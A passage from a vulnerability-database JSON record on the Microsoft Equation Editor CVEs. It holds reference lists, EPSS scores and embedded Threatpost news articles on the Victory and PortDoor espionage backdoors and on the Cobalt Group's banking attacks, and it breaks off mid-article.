"THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0018", "CPAI-2019-0847"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0798", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4011643"]}, {"type": "mssecure", "idList": ["MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JAN_OFFICE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812711"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "symantec", "idList": ["SMNTC-102370"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998980000", "modified": "2023-03-16"}, {"cve": "CVE-2018-0798", "epss": "0.970080000", "percentile": "0.995390000", "modified": "2023-03-17"}, {"cve": "CVE-2018-0802", "epss": "0.974870000", "percentile": "0.999420000", "modified": "2023-03-16"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1660032824, "score": 1660035404, "epss": 1679070268}, "_internal": {"score_hash": "a24f44ce104fed0cdbab01397cdba896"}}

{"threatpost": [{"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulted DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via [GET HTTP request method](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the form said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. \u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** for free.**\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which is awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * Files enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield up a specific Chinese APT actor who would likely be responsible for the attack. However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by those groups \u2013 leading Cybereason to conclude that it is not a variant of a known malware, which makes it useless in attribution efforts.\n\n\u201cLastly, we are also aware that there could be other groups, known or yet unknown, that could be behind the attack and the development of the PortDoor backdoor,\u201d researchers concluded. \u201cWe hope that as time goes by, and with more evidence gathered, the attribution could be more concrete.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n\n_ _\n", "cvss3": {}, "published": "2021-04-30T19:32:34", "type": "threatpost", "title": "PortDoor Espionage Malware Takes Aim at Russian Defense Sector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-04-30T19:32:34", "id": "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "href": "https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, of the Cobalt Group remains active.\n * A new version on the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses a XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote 